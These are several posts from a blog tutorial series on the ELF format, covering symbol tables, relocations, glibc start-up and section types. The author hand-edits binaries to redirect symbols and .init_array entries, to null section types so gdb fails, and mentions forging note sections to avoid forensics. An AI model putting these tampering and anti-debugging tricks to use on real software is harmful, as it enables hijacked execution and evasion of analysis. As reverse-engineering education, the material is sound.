Elf64_Addr (8 bytes wide) r_offset - the offset to the final function. this could hold a number of different kinds of address values or offsets that aid relocation resolution. I expand on these a little later on this post, but to be fair to them please check out the documentation on this.
Elf64_XWord (8 bytes wide) r_info - a bit field the run time will pull through some macros to determine the kind of relocation being defined. The field holds typing information for the Reloc entry as well as the symbol index it is meant to refer to. Quite crucial a field because if you can write to you can make relocs point to different symbols which is pretty powerful depending on context.
Elf64_SXWord r_addend (8 bytes wide) - the addend, a parameter included in the calculation of the relocation - pretty much always ignored in the x86_64 format I'm using. I will explore how true this claim is later on

To expand on how the r_info field is used for determining type information for the reloc, here's an annotated screenshot:

Nothing too fancy, the r_info field (as with many C-esque ELF Metadata *_info field things) is just a bit field that gets pulled through some shifting / anding operations to isolate the bits that are contingent on certain properties of the field.

The ELF64_R_SYM macro is actually for pulling out the symbol that this relocation applies to (I hinted to that in the cheat sheet at the beginning of the section - because I got them foreshadowing skills yo). Here's an example from a random binary I pulled of my machine (notice that the Info field in the readelf dump and how it correlates with the symbol indexes):

Some more insight on how this is probably meant to be used internally to the c runtime can be seen in an extract from glibc-2.28_afl/glibc-2.28/elf/do-rel.h:

We know what a C program will most likely use in terms of its own terminology but what does the format actually look like in raw hex?

One can see the extra NULL 8 bytes at the end, this is the r_addend set to 0 - you will now know why readelf mentions the addend value but its almost always 0.

I mentioned that the [name] part of the relocation .rel(a).[name] mentioned the purpose of the field so I thought I could cook up an example of this in use. We can look at a large sample of the R_X86_64_JUMP_SLOT entries, I grabbed this from a random binary on my machine (literally used a bash script that takes a list and passes it through shuf lol):

Color choice was on point with this one.

Clearly this section provides some insight on how the JUMP instructions that point to the GOT work. I believe that R_X86_64_JUMP_SLOT entries are specifically for preparing the PLT jump gadgets.

Anyway all these beautiful fairy tales about Elfs make great bed time stories for unquestioning children; but lets see if the format is really treated this way. Next section looks at some of the horrible things that could happen when someone messes with the reloc metdata.

Relocation hex sorcery

Lets see which evil spirits we can summon by flipping some bits in the reloc format for an Elf.

r_info mangling

First off I lets see what happens when we change the r_info field up. Here I have two symbols that have reloc records in the .rela.plt and I'm mangling the r_info field so they point to the same function, namely puts; and then seeing what appens (I'm changing the the byte in the r_info field that indicates the symbol pointed to by the reloc record):

In the screen shot I'm trying to show what the picture was before and after editing the relocation metadata. We can see here that gdb actually feels the affect of the reloc because it used it on the symbol for putchar.

What happened here is when gdb tried to resolve the function it made use of the index value we changed. So we made the reloc point to a different index in the symbol table and it used this to resolve its definition resulting in the puts function being targeted instead.

So we've learned that the r_info field is pretty powerful when it comes to driving function identification in some contexts(2). Beyond that we can also look at how malformed r_offset values affect execution.

r_offset mangling

Another thing I can show here is how repointing the r_offset value to the same function affects resolving GOT and PLT stuff. Because we are re-pointing a symbol relocation record here, it affects how the runtime recognizes that a symbol and as a result the runtime is invoked everytime we use a dynamic symbol in code. This is me editing the r_offset's for puts and putchar to point to the same value:

And this is the result in gdb:

On the right we have the binary that was edited, on the left we have the original. In this gdb session I set a breakpoint to the call in the PLT at 0x400420 ; this invokes the __dl_runtime_resolve which handles patching, and looking up symbols. As you can see, comparing both of them when we messed with the symbol r_offset, it causes the dl_runtime call to happen one more time than in the original.

r_type mangling

As for the r_type value (which is defined as a certain bit offset in r_info), I pretty much tried injecting others; but learned that the runtime has consistency checks on the types. There many other kinds of reloc sections that may allow for arbitrary r_types and all kinds of symbol remapping. If they exist and when I find them I'll dedicate a blog post to them.

For now lets look at how miserably I failed:

As you can see, whatever I try is outwardly rejected by the runtime, it won't have any of this nonsense lol. Anyway that's it for this one folks, stay tuned for the next post in this series covering some of the internals of dynamic linking and lazy loading ;).

References and Reading

Footnotes:

To expand Lacan's quote here (purely for the Elf Format Philosophiles): Reality is never what we symbolize it to be, it is what always escapes our symbolization. What is left from our inevitable failure to completely symbolize it perfectly absolutely well with out mistakes exactly right clearly - you get it (why are there so many perfected works for perfection itself)? In this post I will essentially show in some ways that symbols can profoundly betray the functions/variables they are meant to point to: this is because even the symbols themselves, must have symbols that point their own meanings! So there seems to be a contingency on symbols having meaning but nothing that cements their right to point to anything as a specific meaning. They are free to point to any meaning or function (he says as he repoints Lacan's philosophy at the Elf world). But in the practical world in which we use them of course: they can, as an aggregated collection of symbols in some way expose a singular function; we can "recognize" that symbols in a certain category can be "summed up" or "replaced for" (in a context-free grammatical sense) more or less by a collective theme. Such themes are symbols too! But if under an already assumed theme, a collection of symbols misses consistency or paradoxes in a certain way with this theme (which it will always inevitably do - because the hosting theme to every theme is reality itself - which always paradoxes) the whole picture is broken; the theme becomes absurdity instead of what it originally hoped to be. In Lacan's case he argued that this is what in some sense defines our access to "the real" reality and that addressing this too directly caused a reflexive denial of how reality works (we cannot accept the realism of complete non-fantasy or the extreme fantasy either). In the case of linux executable formats it means we need to get some person to reverse engineer the whole binary to determine what functions do from the ground up - which is maddening in and of its own! lol
This means there must be other things we can do with it, perhaps inject functions into the binary or re-point functions at a key time in their lazy loading life-cycle or force a re-invocation of the run-time in a way that side channels information about the functions being called and therefore data being processed? maybe maybe lol Probably better addressed in a separate post.

Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1)

2018-10-10T20:09:00.000-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
this

In this and the next post I'm going to explore how Elf files manage to pull off the magic of symbol resolution as well as the format, offsets and records in the Elf that represent this information. There are many facets to this mechanism in the format, and before I get into each of them I'd like to provide a gentle intro to frame your thinking around why things work the way they do.

Introduction

Symbolically locating the purpose of relocation

If you are already pretty clued up on why this important feel free to move onto the next section.

I know you probably want to jump right in and look at all the awesome C definitions and byte offsets but I found that its much easier to understand how all these obscure offsets and hex values work if you know a little bit of the intention behind them and appreciate the real complexity of the problem being solved. So lets talk about why C programs need relocation and symbol tables.

We know that code can become pretty big and to make things more refactor-able and reusable, we spit it up into smaller parts(1). There is a natural need that develops: to able to break code up into smaller sub-classes/files or general organizational units. In C/C++ this terminology is referred to as shared libraries and the Elf file format offers this functionality through Relocation, Symbols and Dynamic Linking. That is to say that the "things" being relocated, are symbol and symbols are for the most part variables and functions of different flavors.

Suffice it to say "relocations" will be found in the Relocation Tables and the symbols these refer to will be found in the ELFs Symbol Tables - I should mention also there is more than one symbol table and more than one relocation table, for nothing else than efficiency and extended capability in configuring symbol resolution.

The object of compiling and linking objects

It also helps to picture what the compiler does to achieve a preparation of this information. Knowing what the final goal is helps us suffer through the annoying complex and obscure steps that aid towards it.

When throwing together different shared libraries and object files, the linker decouples the actions of resolving symbols from linking the files together. So essentially there will be a first "sweep"(2) that slaps the different shared libraries and object files into a contiguous sequence.
That action means in the final Elf object file, we are simply adding an offset to the original addresses of symbols that displaces them from where the originally appear in their own files.

An even simpler way of thinking about it would be to say its basically like grabbing a bunch of arrays and sticking them inside another array to build an array of arrays (which is a common action many languages). I've depicted a minimal link and compile process with gcc commands included and even stuck in the real offsets some of the functions got mapped to:

basic compile and link work flow with gcc. To get myself out of trouble I've included a relocate() fake function here to say "when this gets relocated it produces this address for the objects mapping in the final ELF file"

So this is essentially the work flow of the compiler at a very high level, what should focus your investigation further would what those deeper details and hex obscurities are that achieve this aggregated behavior. Why does this picture appear to work so smoothly? Well it must be hiding its hideous details away!

In closing, what you need to imagine here is that for each attribute there must be some bits and bytes that allow quick determination of the settings for each attribute as well as how it managed to end up in its place in the final Elf object file. In the next section we cover how this format works and what allows it to offer this amazing functionality and we are going to show how horrible it can get when this breaks!

Notes:

This has nothing to do with development and more to do with the burden of processing language as a whole.
(borrowing some terms that foreshadow your journey into the world of compilers should you get crazy enough for that ride)

Symbol Table and friends (.symtab, .dynsym)

So the Elf format needs to find a clever compact way to bundle information so it represents the plethora of things that determine the type and scope/binding of a symbol and what must be done to resolve it as well. The symbol table is meant to show us the symbols we want to relocate.

I should mention that there are two symbol tables namely the main symbol table (.symtab in the section headers) and .dynsym the dynamic symbol table, which is just a smaller subset of the entries in the main symbol table. This is a smaller copy relevant only to the dynamic linker. It follows exactly the same encoding and format as the main one, but I won't discuss it here I'll give a full swing in a later post about dynamic linking instead.

Before we dig into things, here's a cheat sheet showing you the scope and break down of the Symbol Table:

Symbol Table Entry Field Cheat Sheet

The following struct is used in libelf, it should expose some important information about how Symbol Table Entries work (extract from glibc/elf/elf.h:529-536):

typedef struct
{

Elf64_Word st_name; /* (4 bytes) Symbol name */
unsigned char st_info; /* (1 byte) Symbol type and binding */
unsigned char st_other; /* (1 byte) Symbol visibility */
Elf64_Section st_shndx; /* (2 bytes) Section index */
Elf64_Addr st_value; /* (8 bytes) Symbol value */
Elf64_Xword st_size; /* (8 bytes) Symbol size */

} Elf64_Sym;

I've added the type size so you don't need to scratch through the typedefs to figure this out, you're welcome!

So the way I like to think about this is: Because the order and sizes of this field we can quickly notice that the first 8 bytes (st_name, st_info,st_other,st_shndx) acts like kind of a meta-data header, it allows determination of the attributes of the symbol and everything after that points to the actual value that the symbol holds (its address, offset etc - this depends on the values in the first 8 bytes some what).

Okay so what do these fields mean?

st_name - the index in the .strtab that holds the first byte in the null terminated name of the symbol. Not all symbols have names, when they don't this section will hold a value of 0x0000.
st_info - Field of bits that determines a few attributes for the symbol. Namely the "scope" and the type of symbol in the c program this is meant to aid relocation for. It will indicate whether it is a function or variable or something else. The way this works is pretty much like every bit field, in true C style, it gets passed through a Macro. This Macro applies bitmasks, shifts to isolate the offsets in the bitfield dedicated to certain attributes. Here's the code for processing this field on 64bit architectures (extract from glibc/elf/elf.h:570-579):

570 /* How to extract and insert information held in the st_info field. */

572 #define ELF32_ST_BIND(val)\
(((unsigned char) (val)) >> 4)

573 #define ELF32_ST_TYPE(val)\
((val) & 0xf)

574 #define ELF32_ST_INFO(bind, type) \
(((bind) << 4) + ((type) & 0xf))

576 /* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */

577 #define ELF64_ST_BIND(val) ELF32_ST_BIND (val)

578 #define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val)

579 #define ELF64_ST_INFO(bind, type) ELF32_ST_INFO ((bind), (type))

st_other - This is a bit field used to determine the visibility of the symbol. An attribute that controls how code is allowed to reference the variable per certain contexts. Here's the macro glibc uses to pull out the visibility value:

617 /* How to extract and insert information held in the st_other field. */

618

619 #define ELF32_ST_VISIBILITY(o) ((o) & 0x03)

620

621 /* For ELF64 the definitions are the same. */

622 #define ELF64_ST_VISIBILITY(o) ELF32_ST_VISIBILITY (o)

Visibility types for symbols include (also available from the diagram above):

STV_DEFAULT 0x00 - which means this is the default visibility rules
STV_INTERNAL 0x01 - Processor specific hidden class
STV_HIDDEN 0x02 - means this symbol is not available for reference in other modules
STV_PROTECTED 0x03 - Documentation refers to this as a protected symbol. I believe the only thing that differs between this and a normal STV_DEFAULT symbols is that it won't be allowed to be overridden when referenced from within its own shared library.

st_shndx Field indicates the section index associated to this symbol. Symbols are associated to sections this way because everything defined as a symbol will probably have an associated section - for instance where would variable values be defined? Probably the .data*-esq sections no? There are a couple of special section numbers that indicate something about the section related to the symbol these can take a couple values, please check out glibc/elf.h:414+ for the range of these values.

st_value Value of the symbol this has different interpretations depending on the symbol type:

In executable files and shared objects this file holds the virtual address for the symbol's definition.
For relocatable files this value will for the most part indicate the offset for where the symbol is defined.
For Symbols who's st_shndx is a SHN_COMMON, st_value will hold alignment constraints for when its relocated.

st_size Size of of the symbol, indicates how many bytes will be occupied by what this symbol represents depending again on symbol type - for the most part either the size of the data field for a variable or the size of code for a function.

Lets take a look at how this information is represented on disk in raw binary:

I've skipped the first record because its always going to be a null symbol (same goes for the .dynsym). For the symbol highlighted here we can see the following:

st_value of the symbol is set to 0x400238, which means it will appear this virtual address
st_size is set to 0 which means it won't take up any space in the binary during execution and probably doesn't define a variable.
st_info is set to 0x03 which means the symbol type is SECTION which means its a symbol associated to a section. And Bind type is then LOCAL which means it is defined in the current object file.
st_other is set to 0x00 which means its visibility will be STV_DEFAULT
st_name is set to 0x000000 which means
st_shndx is set to 0x01 which means it is associated to the section defined at index 1 in the section table. If you haven't guessed this is for the .interp section.

I took the first non-null symbol entry and expanded on it but there are always more elaborate examples to draw on, make sure to pop open hexdump and reverse engineer some of these structures yourslef ;)

We are not going to cover relocations just yet I thought the post might be a bit lengthy and bloated. For now we are going to treat the symbols as a piece of meta-data on its own and worry about how the dynamic linker might make use of them.

That's pretty much it as far as the symbol table goes lets see if we can pull off some tricks!

Elf Symbol Sorcery

"Signs and symbols rule the world, not words nor laws" - Confucius

So we know that there are some programs that rely on symbol information; these are things like objdump and gdb . What we're going to do is replace a symbol for a function with another one, and then see what objdump and gdb makes of this.

So this is me placing the address of the main method in the symbol table with the one for never_call:

Just in case you're curious, yes the binary does still run completely as intended; never_call() is uhm never called, but something interesting happens when we disassemble main in gdb:

Huh? I ask it to disassemble main and it give some code for never_call? I never called for that! (I'm milking this too hard aren't I? hehe). Anyway gdb fell victim to that old symbol magic!

We can also see that if we ask objdump about the main method it doesn't seem to have some code for it (if you run this grep on an unedited never_call.elf it will show the main() method of course, here it only shows the stub code for __libc_start_main, which eventually calls main itself - but is a fundamentally different function. ):

When I was trying out tricks for this one I accidentally replaced start, so just to confirm that objdump does completely trust the symbol table check out what it says about _start.

Now you might wonder how main still gets called? If in my mistake and the previous example we are replacing the symbol pointers for main, why does the proper main still get called?

Well if you look at the screenshot above you'll see some of the instruction encoding data in the second output column. Look closely at the one at 0x40046d (which reads c7 c7 30 04 40 00 ). This shows that the address for main, which is passed to rdi ( which is 0x400430 ) is baked into the binary, as in it is passed to _start from outside of the potentially broken functionally of the symbol table. So it will happily march on calling the real main instead of the redirected on in the symbol table.

Anyway that's it for this post, stay tuned for the next one! I'll extend our discussion on the Symbols and include a break down of how relocation work.

References and Reading:

Introduction to the ELF Format (Part V) : Understanding C start up .init_array and .fini_array sections

2018-10-06T01:29:00.003-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
this

In this post I'm going to cover how some of the aspects of C start up and mess around with the .init_array and .fini_array sections to show how they work.

C Start Up

So something must happen to get your code in the main function running. This process is called the C start up and it essentially involves running all the initialize code, setting up pointers to some important arrays and then branching over to main.

What the _start method needs to do essentially is perform a function call to __libc_start_main which is the function that will actually call main().

Now if you haven't guessed, this means we need a pointer to the main function as an argument to __libc_start_main. It has a couple other parameters here they are:

LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)

update: I realized that the original version of the post had the wrong function header for start_main, I grabbed this one straight from glibc (https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129)
for an alternative explanation of this check out - http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html (sorry no https :( . . . <-- those are my tears for your unborn TLS packets *sniff snff* lol.

So what we have here is:

int (*main) - no guessing here this is a pointer to the main method in the binary.

int argc - the number of arguments passed to the binary from the command line, including the binary's name (we will show this later).
char **argv the array holding the actual strings its important to remember some terms here, argv is passed to the _start function via the stack pointers essentially.

__typeof (main) init - This is a pointer to the function (__libc_csu_init) that handles calling the initializer or constructor functions. I'm going to call this a constructor function "call handler"[see footnote 1].

void (*fini) (void) - this is the analogous function pointer to the one that handles calling destructor functions.
void (*rtld_fini) (void) - The destructor function call handler for the dynamic linker, this value is passed to _start via edx from the loader (we will see this being used soon). - I won't get into how the destructor function call handler here works too much, its really a little off track for this discussion but when I cover dynamic linking I'll expand on it more ;)
void *stack_end end of stack marker.

Just to re-iterate all of these wonderful things must be prepared by _start for the call to __libc_start_main, and we also know that rtld_fini is passed to _start via edx.

Beyond that _start is loaded with a very helpful stack layout that makes locating the argv and argc easy to find. Lets how this is done in a real world example.

Reverse Engineering glibc _start

Here's what start looks like for one of my binaries during execution:

To clarify what is happening in the figure above. I am here setting a break point to the _start function. I'm highlighting the instruction that was just executed (note the arrow pointing at 0x400455 <+5>, this means gdb is currently sitting on that instruction).

Digging into the assembler here the first instruction is essentially to clear out ebp. After this it passes the pointer to rtld_fini from rdx to r9; this is actually prepping it already for its cozy position for the important __libc_start_main call. It also saves the value from being destroyed when rdx is used later on.

What the screen shot above also confirms is that the rdx register does indeed contain a pointer to the dl_fini function; this is shown in the x/64ib $rdx instruction which says: "read 64 instruction bytes from the address stored at rdx" (if you're not super clued up on how gdb's memory examining function x/ works feel free to git guuuuuud by reading through this documentation) . You can of course do this equivalently on r9 it will no doubt at this point in execution show the same value - I'm just picking rdx coz I'm used to dealing with it more. Before we dig into this dl_fini function[see footnote 1] lets look at the rest of the instructions in the _start code.

The next instruction at 0x400455 <+5> is a pop into rsi which contains a pointer to the argc.How do we know this? Well we know that this part of the stack contains a pointer to argc because when the program enters for the first time and _start gets called (under the ABI I am running - your's might differ) the stack essentially contains argc, argv and envp we can see this in the following screen dump:

So from this figure we can see the arguments being passed to the binary is "1 2 3 4 5". We can also see that the first entry in argv is the name of the binary itself, this means the length of argv should be 6, as is shown at the first address on the stack at 0x7fffffffddb0. Next argument on the stack is the start of the actual argv array, and after that we have a null terminator and the start of the envp array.

Back to the _start method. After first pop off of the stack; the top of the stack holds a pointer to argv and at instruction <_start+6> we save that to rdx. After this at the <_start+9> instruction we use a bit mask to clear a few bits from the stack value to ensure its aligned properly and then proceed to prep it for the call to __libc_start_main (the reason this is done is essentially to ensure that we are increment the stack and accessing it in neat chunks - it also makes all the tools dump nice groupings of stack information).

Once the stack is aligned it pushes rax onto the stack according to some stuff I've read on this says this is purely to preserve memory alignment boundaries as well, and that this value in rax isn't used and doesn't mean anything.

I've dumped the register values when the call to _libc_start_main happens just to check out what is actually being passed to it:

We are clearly using the SystemV ABI for x86_64 calling convention here. This is since instead of pushing all parameters onto the stack in a given order, we do the following:

Parameters to functions are passed in the registers rdi, rsi, rdx, rcx, r8, r9, and further values are passed on the stack in reverse order.

- https://wiki.osdev.org/System_V_ABI

And as we see the registers contain the following:

rdi - pointer to first instruction in int (*main) function
rsi - argc value
rdx - argv pointer
rcx - pointer to first instruction in libc_csu_init - the program's constructor call handler again .
r8 - pointer to __libc_csu_fini
r9 - pointer to rtld_init the mysterious dymanic linker desctuctor call handler.

And in case you don't believe me check out this dank documentation in the glibc libary confirming that we reverse engineered this correctly (or that it actually works as the code intends) - coming through strong with the documentation once again [see footnote 1] The following extract is from

There are some other interesting details to what __libc_start_main does after this, some of which involves deep Elf sorcery like reading past the value of argv to find envp. There are wonderful articles on this on the internet and the code for __libc_start_main is also available. I take it you folks would enjoy the exercise of confirming it works as described.

To summarize __libc_start_main, and bring the .init_array and .fini_array in to context. Essentially what start_main does is stuff like:

Setup stack guard:

Check that the file descriptors STDIO STDERR STDIN are setup properly:

https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87

Some other cool stuff and of course eventually makes the call to (*init) which in the context of start_main, means __libc_csu_init. This is the function that as we see in the footnotes actually makes the call to the init functions we define. Here's confirmation of that call chain from gdb:

foo_constructor is obviously our constructor and we can see it indeed does get call first from __libc_csu_init. These constructors are saved in the sections marked .init_array and the analogous array for deconstructors is called .fini_array. Next section covers how they work.

.init_array and .fini_array Sections and hex sorcery

I'd like to get straight into deconstructing how the .init_array and .fini_array sections work. Lets see what they look like in the section header table and annotate all their fields in an honest hexdump:

What we can see here is that the .init_array section points into the ELF file at 0x0e00, which holds two addresses:

0x0e00 (.init_array)

0x400540 (frame_dummy) - not going to dig into this too much, but what I glean about this for now is that this sets up things to be able to do exception handling and reconstructing stack frames to aid debugging and stack forensics. More on this here and here.
0x400440 (foo_constructor) - our constructor!

We also have the .fini_array section at 0x0e10 which is holds these entries:

0x0e10 (.fini_array)

0x400520 (__do_global_dtors_aux) - handles destructors when .fini_array is not defined according to this.
0x400430 (foo_destructor) - our destructor!

So we know where to find the pointers to our desctructor and constructor functions and we know when they will be called, lets see if we can force the binary to call another function instead.

So if I were to make the .init_array point to the function never_call, which as in the previous example is never called under normal execution here's what the hexdump would look, like:

Win! We can control the flow of execution by redirecting the entries in the .init_array section! This works of course the same way for fini_array I'm going to leave that for you folks to figure out if you'd like to.

Thanks for reading this one, more posts on deep Elf sorcery and other wonderful linuxy things comings soon!

References and Recommended Reading

How C Programs get run https://lwn.net/Articles/631631/
System V intel https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf
System V ABI https://wiki.osdev.org/System_V_ABI
Examining Memory with GDB https://sourceware.org/gdb/onlinedocs/gdb/Memory.html
https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf
http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html

Footnotes

1 - why _dl_fini should be refered to as the desctructor "function call handler" in my opinion

This is since, though some folks refer to this as THE [de/con]-structor function, in reality it is only the standardized function that finds the pointers TO the user defined [de/con]-structor functions. Here's why I say so, extract from https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137:

What can I say folks that glibc comment game is solid though. Code speaks for its Elf around here ;)

So I take it, this makes it obvious that the pointer to the dl_fini function can actually be refereed to as more of a destructor "call handler", no? To close my point lets look at dl_init.c for the definition of __dl_init as well:

Pretty much the same thing, it uses some link map type object ( ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY]; ) loaded with the offsets and all the ELF format goodies. Uses this to calculate an offset to the init function array, and then just runs through them calling them with pointers to argv, argc and envp.

Anyway, while make that heavily egotistical point we actually traversed some pretty important code in the Elf world, this is the very definition of the _dl_fini function that handles your binary. If you wanna unlock the s e c r e t s you should spend some time digging through that /elf/ directory.

Introduction to The ELF Format (Part IV): Exploring Section Types and Special Sections

2018-10-04T17:54:00.000-07:00

Hi folks, this post is part of a series about the ELF format. So far in this series we have:

ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
ELF Header and Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
ELF Header and Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html

In this post I'm going to go over in detail how some of the sections in the format work in a bit more detail. Previous posts didn't really expand on all the weirdness that each individual section type and format can harbor, especially in how it can break interpretation of the file under normal debugging and reverse engineering efforts. We're going to run through a couple sections here, talk about different section types and see what ELFs can make some of the binutils do if we mess around with the bytes. Hope you folks enjoy!

Section Types

From other posts I've already expanded on the section table header and in that header we have a field called sh_type, which indicates the section type. Each section type is like a model or layout type for a given kind of section and imposes certain attributes to how the bits and bytes are grouped together to mean things in those sections. For instance they might be simple lists or complex nested hash look up tables.

To make this clearer; lets imagine how this aids problem solving in the ELF format. Lets say a compiler, malware or exploit developer needs a section to host a simple list of strings, in this case a section type of SHT_STRTAB would be appropriate. And as we see the .shstrtab and .strtab are exactly those types:

Here's a list of what the some of others are meant to be used for:

SHT_NULL - purely for storing null bytes, documentation refers to this as directly for marking a section as unused and will most probably be skipped over by most semantically driven ELF utilities. This is also a field that sometimes avoids reading strings over-into other sections. One can imagine many C programmers enjoy scanning until the cows come home OR they hit a null byte - this is the odd reason why such fields are necessary sometimes.
SHT_PROGBITS - This is just a marking for a section that says it could contain anything, and the format is usually dictated by the program being executed essentially. PROGBITs is pretty much for program specific behavior - which could be anything - literally anything even Turing complete anything! These are typically used for marking the sections that contain actual code for execution, the data section, initialization / finalization procedures (or perhaps even wilder concepts specific to the ABI or compiler producing the executable code sections and accompaniments - again this section type doesn't impose much format control really)
SHT_SYMTAB - This provides a pointer to a section that should have the format of the symbol table - I will of course flesh out how this works later on in the post because it needs it own space so in a literal way I'm going to use this keyword to mark a section further down in the post :)
SHT_STRTAB - A section that holds a null terminated list of strings.
SHT_HASH - This section is for holding a hash table, usually to speed up looking for symbols. In fact documentation says that if an executable participate in dynamic linking it MUST have one of these sections. I will put that bold brave beautiful claim to the test later on in the post (if not in its own post depending on how exciting this potential lie becomes).

There are tons more section types, I thing its best to revert to the documentation on the full list instead of re-creating it here. Lets take a closer look at how some of these work though.

SHT_STRTAB section types (.shstrndx and friends)

Looking at what a typical SHT_STRTAB is like in a hexdump:

As you can see the strings are nice and neatly delimited by null bytes, super easy to not mess this up when reading in strings in C :))).

In previous posts I mentioned that the .shstrtab holds section names, which means it provides a good starting point for mangling the section attributes in a way that skews their interpretation by debug tools or other ELF interpreters - a key skill in understanding how they work!*

So in this same method; for the first experiment I decided to point the start of the shstrtab down 8 bytes to see what happens to readelf's output about the sections; I get the following results:

Just to make the diagram clearer, what we have here is on the top frame, the raw hexdump of the start of the shstrtab. Originally started at 0x18F4 and we shifted it down to start at 0x18FC.

What you should see in this perhaps bloated diagram sketch; is that by moving the start of the shstrtab section we've seen that the strings jump 8 bytes down for each entry. More accurately we can say they all start 8 bytes down, but because they are strings readelf will read bytes in until it hits a null byte. For instance we can see that the first section name instead of .interp which is at 0x1910 originally now points to 0x1917. The .interp section usually the first valid section is now called .note.ABI-tag.The following section name (which starts 8 bytes down) is then, I-tag (since this starts at 0x191F) and then reads until it hits the null byte at 0x1924.. The rest of the sections follow the same pattern - good exercise would be to to confirm this on your own.

Okay so what happens when we mangle the section types? Lets say we NULL them out, swap section types on some of them and see if the program still runs - and if it doesn't why and how far it manages to get close to running.

Here's the results from NULLing out the section types (re-call that marking a section has a null type in the section header table imposes that it will be "skipped"):

The large white column here marks the column in this ELF that contains the sh_type bytes, I'm really just being lazy with labeling here and leaving identification of the individual section types up to the reader if need be. But once you get in the swing of identifying the section table layout by hand, you'll quickly realize if this column is null it immediately means a whole bunch of section types are nulled out. The smaller boxes next to this column, shows some virtual addresses for some of the sections, I highlight them here so you can see quickly that we have indeed written over the records for sections shown on the right. We can also see in the hexdump that the section header table starts at 0x1a00 (which is a common value and the one we often see for the example binary I'm using, so we can guess that I probably didn't change that, the faults are here caused directly by the section sh_type mangling alone). To confirm another way we can see that in the readelf output on the right, all the section types are indicated by NULL.

We can also see this does strange things to gdb when its trying to load some information from those sections and can even break its ability to interpret it as an executable:

Some rudimentary anti-debugging right there. Of course the immediate compliment of this as a reverse engineering effort would be to reconstitute the section headers from a stripped binary (this would work essentially by understanding common layouts of the file and identifying the most possible offsets for the sh_* fields). It might be worth it to explore what happens when you mangle other section attributes and pass it to other utilities like strace and ltrace. Moving on!

SHT_NOTE sections (.note.ABI-tag and friends)

The SHT_NOTE type sections are simple lists of integers that provide versioning and typing for vendors. The GNU folks tend to mark ELFs liberally with these sections on GNU/Linux systems. In fact these sections are meant to indicate that they were built by tools from these systems and indicate versioning information about them. So it lists your kernel version or GNU tool version potentially lets say (of course if you're doing forensics this might be helpful, or if you're avoiding it, it might be worth stripping or forging this field hehe).

This section holds some semantic versioning information about the ABI being used and the operating system this file is for. The format of the field is basically simply a list containing 4 32 bit-words or 4 groups of 4 bytes. The layout works as follows:

0x00 (4 bytes) namesz - size of the name field in bytes.
0x04 (4 bytes) descsz - size of the desc field in bytes
0x08 (4 bytes) type - the type field of the OS ABI
0x0C (4 bytes) name - the name field containing a null terminated list of characters
0x10 (4 bytes) desc - the description field holding some numbers that indicate

Documentation describes that you can potentially have a note section that has no descriptor, in that case we just set the descsz to 0, and don't have the section at 0x0B.

Here's what a note section looks like in a hexdump:

Here we can see the following settings for the field values:

namesz is set to 0x04 00 00 00 which means the name field is 4 bytes in size
descsz is set to 0x10 00 00 00 which means the description field is 16 bytes in size
type is set to 0x01 00 00 00 which means this is GNU/Linux (because my machines are FREE machines!)
name field reads 0x47 0x4e 0x55 0x00 which we can clearly see reads 'G' 'N' 'U'
desc field holds an array of values starting at 0x268 -> 0x27C.

The desc field needs a little explaining and the documentation on it is slim but here's a couple places that may expand on it better than I do (I've included them in the reading and references section) To see how its handled check out this extract from glibc-2.28/elf/dl-load.c:

Essentially it indicates the OS version and this is clearly compared to a standardized value in the library when dl-load handles it. How exactly this OS version field works is going to take a little more research on my part before I get much more mouthy about it.

Conclusion

That's going to be it for this post I don't like to bloat posts with too much text because as we know things are easier to understand when they are broken into smaller parts and carefully studied*(see the side rant for more hehe). In further posts in the series I will expand on the rest of the sections. For now I hope that cracking open these few I've started you on your way in detailing how the others work too; by understanding their types, and therefore layout gives us power to control how they are interpreted. There is a lot more tricks that can be pulled off by messing with these fields. So happy hacking!

And stay tuned for the follow up posts on the GNU_HASH and other weird archaic section types.

References and Recommended Reading:

*<side-rant>
Why is this? Why do we need to break things to learn them? Especially in computers? As we know in many sciences we learn how things are build by breaking them down, tearing them apart and boiling away their non-essential parts and deciding what they mean from the perspective of their super-structures - we study how the "super" works by breaking open its "minor" parts i.e. we learn how large complex curves work and behave in calculus work by breaking them down into small straight lines; or learn what particles are constituted of, by smashing them into one another so we can see the smaller parts; or learn how philosophy texts work by deconstructing them in some contexts and reconstructing them in other contexts- it seems to be a common theme in fields held to traditions of rigorous logical thinking.

